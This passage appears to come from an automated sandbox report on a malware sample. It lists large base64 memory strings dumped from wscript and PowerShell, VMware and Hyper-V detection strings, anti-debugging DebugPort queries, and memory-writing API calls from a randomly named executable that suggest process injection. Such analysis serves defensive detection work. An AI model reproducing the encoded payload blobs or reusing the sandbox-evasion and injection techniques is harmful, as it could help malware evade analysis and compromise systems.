KnKvYB4qpdMoGQS9pnRQJzYBlA1wAqTjjNTjFuk80cQatvhvnUPS4KFVOHakWMrKzocrN46s3eqRjqjzNpFxmRl2GVyFI5cw21YmoTKNH+3Hk/VCLyfkhP3QMXzgjbMuSgru6Hhuk6B/ErDsqTd1jRKL764mWK2aLLhGoJg2wwAdJLBiK5DPpdjBlomhWfceJQ7P3oH/cKFzzG9SrSdD5BAgeNTWlXotYBCvSBa0ZuzBKO9bbpvvbVYZE9XfNyIG8ZJAXiq3+qB3TySUy08/p95UmC9CTdzb23/iPLhD0qA9PbQlg+X47ENAUkaxIse7oIOKVJ/F0Frj2Qw4/G2Wh7V/f+zNpINeQ84/dDTbxbxh8FfwEpGgpSoYqk12p0qiuYp8MjlHILQm+Q7SIOTWOKZDu3LsQc6CPYu/EvS9eah68/cUFGyhKj+AN/kR/04+prtuTHF3FBIFvna/uDSXXbZW42Up0d9GecjDEC1Ep7LUiqLjYBXXwbHzA003stvXWDY5LCz2JBNIPgDQbyo6g2JixfidQraGnNC5UmHlJKadEfxBOyWWZlAlHQ5mKIM5oz88Au8idkgbuDpadh9KCWvrTcVNHgqj7I37CuQdTHIEj1SjwTuQLSbznaxPRM95qepMk9/gtoMcuASSsv+//AEe1FdqHaG3EXUtsZ8AoPSG/0mAwh/0dGvnHQku+
Source: wscript.exe, 00000000.00000003.1800139870.00000231391B0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: mnAbQ3TfJitRy5rVwZYRehKNRMm5Of+MPHs+Tx6RK2IG4Y359yqFHF8RNdcC9bqqek9paAjzPVHKLHywoGfWcTxbBXxThePB2lF656EXPFccgVm3vh+yVGccsexWWtfLqHxiub8jvkxVBtZv9UrcfqlXRl8jYVOKe0HIh1g2MobwnSuIwpPQp5/ootYHXJKwf9aGcEsT/yl1Z0LceB6sfue4g0hRGAehMGuCjkl0sXCqAmFPCFaDZAl/BF57FhsuNezKaKyR3bXOm40lw6yiy1Wk4asUJbXzmtpfJ5CWb9BV0xDvqwN4HEtDh6TCeQ/Ts7P9s+oXFA30osgJJHSgmGqB7tCIx4zAB4ce42WvqZVzmsobGAvXjGZgiX3SBaGaT8x0+d7y7FwHa8K1aog+FaURJI36uvtO69/rLm2VpSdG6W0YqD4Yy+gQ1mAvBya1RGa3uc78CG/gvMcIB1ogIVQ+PfYA8q4sMl15wQZN2JE+eI1PAQjlIrgNk3w01BlP4vzXnTbpXWypeT9P+K0IAeU4/+w0/kdeyJe1NoY4cQL8eqe/CYKX1gx24hJdz5DTznKhi6BmAarEfkGu7J3FDAJI/DSyOSuJbOWWFgpIQAS3uE6R2vBWcU723JG4EPiuWwgwRM90FmUT62BQzvHdPrBGZS/ry8349GXbKWIca7eRX06Xt/LrBC3+YWn6sSoeFZAuZDspaHHC5sM0aZrWgGsymX0kSQBjtu3V0dAi+hpkC44yECgiin215MrlSd0tDUzQ3r4njLiLvXCnzgC9/ILwJf2ZU8EPmGVB0SRjYTGJqI+avW7CIOsZf6PgyFMb/PayPQ5r6zEDNe7yLYas2p0QX9DCNmbFyfDmkBjR2vQ6DZuoRbLCVI5DzWKRgF3Xf9X2om5nqu9yXIBzzK3OOqsnF1rw3OxubPa2uIEau9RKjKp1CyUAAbpvNDYCaIQkW+Ck8Z+6YYcF4rVTYMZuYrF5IZnSfE/96xLGq3zdppFfjtoMFEeIQbnAaS+ItR64KgEgZ6GNAf1U72XOc4C5LRDzg61F+8W/f48K/ewIQiFpt/LQvbk5DVjnusJ5Gjal3QvdnFZc0j81TQnIWjZlwbe0KPYBveUlNEGM90YM6v5W1pX4OeLicvACxwyXRdgeKwhitRDBFZB7r6fDIGUl0QGaOYMcrNVnS1d7aAapGkXaxjuGL/ynBxCV1iZWdzt4FuZVAUFekiqlmG40/ABFjSzdA21eBJVp1kf1jxc9/OHjqnWSBeyrjiMVVyZB0sPuseV0E3dDY+LB6zpUeNCLnYB8LOPaI5e6qK4wwl0TtbGx829iWoRQPuao/uanG8BDVrN3KALQPoxlp2oN7LpJJwrHRTMxhK9RkklKKpJH//tkEPT3FH4r0oSESG505fyPqsvJtsvMMe55Ivz7ex1/H+kfuIBkvAxgSr6ynZh1SgQQRGmooFk/YcpGx9UlvMTwberewCwIWsxb8f91mFOEaYCrIaQ6RjzoM3teJBC4+V2gDznOQ6KpW7GMHOrlg3LkhG4Oxwcw4BsxUPUU6UShLbOnaMJNOXqg9vIkgU5c99XNCfWgbyuSNT7mDO1jgjjthKcpx5qYxYB64dWyTavIqC3iz8UPu+8m5htzj1wj4O/+H8gq9U7CgR5caOHTjP32/W38Byt+VsVnHhgT0xAL2NLMoUqLxsAa2PWjD92yfbOXl+6GQcmrFvTuyC2yrz0dR9SdrElLm1Vv2IEl+ToMj5KCjlyMtwTIDValvw3sTAIA588hyDE0YoEQd2qK8fE10WUtlPg0DX2Kj9Ib6vPJcEfbUbaNjI7tLIwSiI9w1q10aZGSHdX6/6byXswVAUe4vKlWNZESXiojjqmnCDJciXS3IMsiolcZ1lL/iyi7Gft6siQXc434CR/pwfCMPs1mL9lVcWiMfqf/n6M/3+m/FGL0jW5qIexOwQW8bOyUZTTYt4MSehULE9wUmRRcm5mpct+bCVwP8JqqhSjmahxk4Qyna2HuZIWpvTLCLe2PnroJ+uIQWq3IOYC78Lxp
Source: wscript.exe, 00000000.00000003.1800096166.00000231392B0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 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
Source: wscript.exe, 00000000.00000002.1801873166.00000231390FE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: powershell.exe, 00000001.00000002.1787272397.000001CFE30F4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSIdRom&Ven_NECVMWar&Prod_VMware_
Source: wscript.exe, 00000000.00000002.1801585342.00000231369F8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1798831358.00000231369F3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWP
Source: wscript.exe, 00000000.00000003.1800139870.00000231391B0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 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
Source: wscript.exe, 00000000.00000002.1801873166.00000231390EA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1801585342.00000231369F8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1798831358.00000231369F3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: wscript.exe, 00000000.00000003.1800096166.00000231392B0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 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
Source: firefox.exe, 0000000B.00000002.2506862622.000002B1F9F1C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllUU[
Source: runonce.exe, 00000009.00000002.2974317535.00000000026EB000.00000004.00000020.00020000.00000000.sdmp, xBjKgBCuI1jq.exe, 0000000A.00000002.2974921964.0000000000F09000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: wscript.exe, 00000000.00000003.1800139870.00000231391B0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: PYX2cZ4xzJJjcS7A5684VuJ/f1TVjF3sUumkuzHq8QR5v4L8tTkZk+0jKHNqfoHH8D4iivIIYfYxZuWCM+FP9v+fWeeoWESDHRsyrFpppgEgDdWZe2E84u2XW0CxcpJDxZvOjca55Ndl6+/93/5SnwIqa21sAQjfudbWkCehGyCY/bMRetbTYYUdKLYvqDPAFZMZsErwyMJxEmHppPmr4rTHugKJcZ9XAY8A3psg04rhU/Kfrwi0R8VhRMPY19YmcgPaXsxoOQc0zOJhUDw9zDMgSoFyPnKeTRxeyCcvv+Ju0xCN/420M+GdWCxkT3AOIo0NTxSE34HAcrn/RWMXIjYdaeJWRI4Gxyflo58/LUw9RLSCzpGG16BP0GL6GvC800bc8hoIas5ICZBfxsWrRn+NsQcRc9z15c+Rd/f3P7in/KEL34FeIuyyKd2E5glBbv4Ye9lB1C/H12Lbxk9Obb7dSHyFqFhsruXwxVuwLdGs8zu1y/rOY8NSZA7lFBXSDUI90pSdmb6yf5jeTtIwJ9+hakD8SQgKKRMvBFf4x4okRLCplY96PWtQ3krXMT4t7yBqfVMw+knNZQLWfqo8HAoSnlOh919MH5Q/CjRWEAStsjQ+x9LShj5fcDxteFnic5FSjadjOu2HiJ9y8xPgryyuHQwrtmHuVGqB8Qd05OU6hIfwIihVYfsVJy/w88PRIikZQDx7X4uMBxPy827xuiS8EgxJYGpTiC4SDDr2NWzWATXi2hvAwBe446xpnuB304TmZ1JA7eqR7nLKu9gQy1Jr9qAQwQEjxYsyBcXKP8S9Lys6vYiAviNwk8UnPBPBihjiLfk1RImUTFvuZkhrY6pje6dAZZqRvT98ZPBq1XRAtsO5FEc5SyZ8JFIyU81QJHaKQdXsAzEozS5KQDZKlGEqLlwsLEiUXVVjVKvCNcUvCertwZljGe+88UHUs4zgXvCZ5O9BvapWl8TCCzSImgHPL/ODDNCTCJz57WOfDf+MmIsxbcNDsOfLBZ4gduJ5DGI+MIN6SLXyeAKI6/8JFtOWFb6HE7SpcSW5JvEFatKobn6+6Y+GFoJhnBMX8QHKE8OoA988OVZp/wLnNudZuvzBT0C9cPmlbtRzfVhaX+A+Wb5DjjIjSdDjs/UlTJqBury4ueL52leMixbIRWzZzdcLPSgoFKYV0Xv772N5/aGQyXQgspAKIvKUEzHMzwwrPxKPwrJJ2Sdq+7FmA2G1pI2JagP648wYK9a8mpUq//4joYxHm7dG8aKzoMaztSNwErKEgSnD7ywWUDXXoai+eAdwjUo4UGERzkRyy0b4DqKS5kDQGMlxfxO8oAqpxx8i2diM1pmwCU7P1HzzFPJNei/d/rN91RVPmw0oCHM1pgQzuTAE1wrYApU4wI+srCo5AVK6jLZ/2+lcyuip6fAAAsE2Y2IQDcozktucJ02Gv7ge8YFA5mXnh7Jyriia3XCVy+DBUSOytVBOF1AjzI9IoU+ww+pd4iWJkDvTWeUCk4JI85M1nBixJqOIXSnGyad/YCbp0DdKOU+/pT7MDgGqeMUdL83i0I9vEMQ4HUvqcu2XCXn9VFMliU36VE/lDkLQ4/S4HStcdx+csR+vrO8X/+Fd6xws6/GfRZslExTRLqsictvCqCooUCqRsoENahlT4q0E5F9Gnr5OZ6dGnpKA4Zwfa6edTCVK3XI+dAsQ2vz1HUsIOQABXOVqiD7p5TOCvn7GhRqxDeaJJaBfNixQhnoAEP4E1T0CPu0Jc7MK2Z068jHfB7RV6I3Gx8BoPdBayGQK59PK+uGHAT/hT/SuhVV5Uuuwsr+KIhkDfDJnZ+jOVv1ZLViU8Tzp+u3yLSEr2J71Wd2swDbdJ6FimkHHN2gui7xfcs890on8vYPym27iasQBl2oR629pSxY8f44N9RBPR+0gyHV1r/KILzlx0xOtwC/3xk+tYkhhCJ12XuoAJ7TWOw/4OqwJR7KG9vDmFoek9ueAgr2Y1yWH1qTSXQi2n0Pg+ODMShh9v/BE/wG7auikytnTa9kfkWr54sJTrwujQ2/7BfxKiGEwwUsbHPXSK/ot2zyHz9uvquy/odASF+KTMhwtCnLKbRU0XVHUgqVC8/j1tgkcLWb4I8HmSaJH24QwbFEhx1oVRvHdkC6srvLCddcvGpY12Tszk2qHS1PsKPn7s8AWFmwH6Jg9yHJ4vbRcV+LF8ypkBXttjCM3FbibvTHIbxf9uUl0nZZCaybanri3xOAG21omOSC+wd7FUPmP0RjHMzDH73jc31dVdGPJP/9aQN6YfFBtsBoVEguwi85MoNcJEWikjCG/jTZ2KExdKfFgXVN4hmOl8ZO7fDKNIwn9rAF91G1HS9oDx7sIenTCbDbXcig+vhD59PeYHvL3AyHDkiM3mKUmr1bRUgZszs9LpGyW2fxQpPG9eX9x2oFDi7dSbmtCCUnERgkvaXfIAak0BxQmAzRD9kgTzPUMhbFuHyDLa68oh4d7jIezZr1DYPUrIe6fu+qthf5uZulZFBVL6RUO0jytnMUSsh7BPkAe4z6vYOYW0bQElI7bVTLtzPeIpMZ28P7h9pO++7nuiLwgd459wsk/oHe+xgDI5JpbznXeP1/tsCxGjCUcAfkO+nezzq1uXIp6Z+hoey9MmDM3Wzq9pll24e4imQPLD7Nq1yDDzL83lwUB96l1DbYcQLRx7+yu9mqzLl+o62bDyix9CgBsGBP+N/R3uRtkVV/SJGbfSxWP5plTa3B+v8qc599YvgOjQFyjABabREI/RSbtxU+yHeWHb4+Qi/yx4KEWWOEZlQFZUUiXgdPGLK5EOd7YQPbkrQvotL4lKRCBfsXhhrVviloM1hnxv49Wt4CdQRMYvMc5Bk8jWWka56GA6fzhKoL4bMfar7m/Z+49+/5I1c6WSVqcaMNjZX/PkXMuPbqTQRuzqyPRJkDTD1aUpRrC6MFtjtNR7NN+yvPD5dUyO+N1wt+BCuRbF8PB+N2SkeEf

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\runonce.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Program Files (x86)\gIREEBsbXssxtwKkMKvDTBBLViqVuETHlLrFwnWJjmjJmQXPIXTAYTbEEcuPzNzWLUcNWAXpeeWFdBGY\xBjKgBCuI1jq.exe	NtWriteVirtualMemory: Direct from: 0x76F0490C	Jump to behavior
Source: C:\Program Files (x86)\gIREEBsbXssxtwKkMKvDTBBLViqVuETHlLrFwnWJjmjJmQXPIXTAYTbEEcuPzNzWLUcNWAXpeeWFdBGY\xBjKgBCuI1jq.exe	NtAllocateVirtualMemory: Direct from: 0x76F03C9C	Jump to behavior
Source: C:\Program Files (x86)\gIREEBsbXssxtwKkMKvDTBBLViqVuETHlLrFwnWJjmjJmQXPIXTAYTbEEcuPzNzWLUcNWAXpeeWFdBGY\xBjKgBCuI1jq.exe	NtClose: Direct from: 0x76F02B6C
Source: C:\Program Files (x86)\gIREEBsbXssxtwKkMKvDTBBLViqVuETHlLrFwnWJjmjJmQXPIXTAYTbEEcuPzNzWLUcNWAXpeeWFdBGY\xBjKgBCuI1jq.exe	NtReadVirtualMemory: Direct from: 0x76F02E8C	Jump to behavior
Source: C:\Program Files (x86)\gIREEBsbXssxtwKkMKvDTBBLViqVuETHlLrFwnWJjmjJmQXPIXTAYTbEEcuPzNzWLUcNWAXpeeWFdBGY\xBjKgBCuI1jq.exe	NtCreateKey: Direct from: 0x76F02C6C	Jump to behavior
Source: C:\Program Files (x86)\gIREEBsbXssxtwKkMKvDTBBLViqVuETHlLrFwnWJjmjJmQXPIXTAYTbEEcuPzNzWLUcNWAXpeeWFdBGY\xBjKgBCuI1jq.exe	NtSetInformationThread: Direct from: 0x76F02B4C	Jump to behavior
Source: C:\Program Files (x86)\gIREEBsbXssxtwKkMKvDTBBLViqVuETHlLrFwnWJjmjJmQXPIXTAYTbEEcuPzNzWLUcNWAXpeeWFdBGY\xBjKgBCuI1jq.exe	NtQueryAttributesFile: Direct from: 0x76F02E6C	Jump to behavior
Source: C:\Program Files (x86)\gIREEBsbXssxtwKkMKvDTBBLViqVuETHlLrFwnWJjmjJmQXPIXTAYTbEEcuPzNzWLUcNWAXpeeWFdBGY\xBjKgBCuI1jq.exe	NtAllocateVirtualMemory: Direct from: 0x76F048EC	Jump to behavior
Source: C:\Program Files (x86)\gIREEBsbXssxtwKkMKvDTBBLViqVuETHlLrFwnWJjmjJmQXPIXTAYTbEEcuPzNzWLUcNWAXpeeWFdBGY\xBjKgBCuI1jq.exe	NtQuerySystemInformation: Direct from: 0x76F048CC	Jump to behavior
Source: C:\Program Files (x86)\gIREEBsbXssxtwKkMKvDTBBLViqVuETHlLrFwnWJjmjJmQXPIXTAYTbEEcuPzNzWLUcNWAXpeeWFdBGY\xBjKgBCuI1jq.exe	NtQueryVolumeInformationFile: Direct from: 0x76F02F2C	Jump to behavior
Source: C:\Program Files (x86)\gIREEBsbXssxtwKkMKvDTBBLViqVuETHlLrFwnWJjmjJmQXPIXTAYTbEEcuPzNzWLUcNWAXpeeWFdBGY\xBjKgBCuI1jq.exe	NtOpenSection: Direct from: 0x76F02E0C	Jump to behavior
